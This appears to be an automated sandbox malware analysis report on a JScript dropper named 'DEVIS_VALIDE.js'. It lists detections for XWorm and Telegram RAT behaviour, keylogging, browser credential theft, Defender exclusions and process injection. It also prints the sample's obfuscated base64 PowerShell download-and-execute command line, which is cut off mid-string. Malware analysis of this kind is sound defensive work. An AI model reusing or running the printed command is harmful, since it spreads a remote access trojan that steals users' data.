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Analysis Report
General Information
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Antivirus detection for URL or domain
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Sigma detected: Copy file to startup via Powershell
Sigma detected: Paste sharing url in reverse order
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Potential dropper URLs found in powershell memory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Uses powershell cmdlets to delay payload execution
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
- System is w10x64
- wscript.exe (PID: 7136 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\DEVIS _VALIDE.js " MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6308 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ jPhaA = 'J A' + [char ]66 + '2AH gAYg' + [c har]66 + ' DAHgAIAA9A CAAJA' + [ char]66 + 'oAG8Acw' + [char]66 + '0AC4AV g' + [char ]66 + 'lAH IAcw' + [c har]66 + ' pAG8AbgAuA E0AYQ' + [ char]66 + 'qAG8AcgAu AEUAcQ' + [char]66 + '1AGEAbA' + [char]6 6 + 'zACgA MgApADsASQ ' + [char] 66 + 'mACA AKAAgACQAd g' + [char ]66 + '4AG IAQw' + [c har]66 + ' 4ACAAKQAgA HsAJA' + [ char]66 + 'IAHoATw' + [char]66 + 'NAGoAI AA9ACAAWw' + [char]6 6 + 'TAHkA cw' + [cha r]66 + '0A GUAbQAuAEk ATwAuAFAAY Q' + [char ]66 + '0AG gAXQA6ADoA Rw' + [cha r]66 + 'lA HQAVA' + [ char]66 + 'lAG0AcA' + [char]66 + 'QAGEAd A' + [char ]66 + 'oAC gAKQA7AGQA ZQ' + [cha r]66 + 'sA CAAKAAkAEg Aeg' + [ch ar]66 + 'P AE0AagAgAC sAIAAnAFwA VQ' + [cha r]66 + 'wA HcAaQ' + [ char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJ wApADsAJA' + [char]6 6 + 'qAGsA dw' + [cha r]66 + 'qA HoAIAA9ACA AJw' + [ch ar]66 + 'o AHQAdA' + [char]66 + 'wAHMAOgA vAC8AZA' + [char]66 + 'yAGkAdg ' + [char] 66 + 'lAC4 AZw' + [ch ar]66 + 'v AG8AZw' + [char]66 + 'sAGUALg' + [char]6 6 + 'jAG8A bQAvAHUAYw A/AGUAeA' + [char]66 + 'wAG8Ac g' + [char ]66 + '0AD 0AZA' + [c har]66 + ' vAHcAbg' + [char]66 + 'sAG8AYQ ' + [char] 66 + 'kACY AaQ' + [ch ar]66 + 'k AD0AJwA7AC QAUA' + [c har]66 + ' pAFUAUQ' + [char]66 + 'iACAAPQ AgACQAZQ' + [char]66 + 'uAHYAO g' + [char ]66 + 'QAF IATw' + [c har]66 + ' DAEUAUw' + [char]66 + 'TAE8AUg ' + [char] 66 + 'fAEE AUg' + [ch ar]66 + 'D AEgASQ' + [char]66 + 'UAEUAQw' + [char]6 6 + 'UAFUA Ug' + [cha r]66 + 'FA C4AQw' + [ char]66 + 'vAG4AdA' + [char]66 + 'hAGkAb g' + [char ]66 + 'zAC gAJwA2ADQA JwApADsAaQ ' + [char] 66 + 'mACA AKAAgACQAU A' + [char ]66 + 'pAF UAUQ' + [c har]66 + ' iACAAKQAgA HsAJA' + [ char]66 + 'qAGsAdw' + [char]66 + 'qAHoAI AA9ACAAKAA kAGoAaw' + [char]66 + '3AGoAeg AgACsAIAAn ADEAcAAyAG IAcg' + [c har]66 + ' qAEgALQ' + [char]66 + 'RAE4AWQ A1AGIAcg' + [char]66 + '3AGkAT A' + [char ]66 + 'aAH UAWQ' + [c har]66 + ' zAFcALQ' + [char]66 + 'SADUAOQ ' + [char] 66 + 'VAHc Aag' + [ch ar]66 + 'k AFMARQ' + [char]66 + 'WACcAKQA gADsAfQ' + [char]66 + 'lAGwAcw ' + [char] 66 + 'lACA AewAkAGoAa w' + [char ]66 + '3AG oAegAgAD0A IAAoACQAag ' + [char] 66 + 'rAHc Aag' + [ch ar]66 + '6 ACAAKwAgAC cAMQ' + [c har]66 + ' hAGEASA' + [char]66 + '5ADQALQ ' + [char] 66 + 'CAEw AMQ' + [ch ar]66 + 'q AHAAQQ' + [char]66 + 'uAGoAaA' + [char]6 6 + '0AGUA ZwA4ADgASw ' + [char] 66 + 'NAFo ANw' + [ch ar]66 + 'j AHUAOAAxAF oAMAA1AHcA JwApACAAOw ' + [char] 66 + '9ADs AJA' + [ch ar]66 + 'j AHgAcA' + [char]66 + 'mAGQAIAA 9ACAAKAAgA E4AZQ' + [ char]66 + '3AC0ATw' + [char]66 + 'iAGoAZ Q' + [char ]66 + 'jAH QAIA' + [c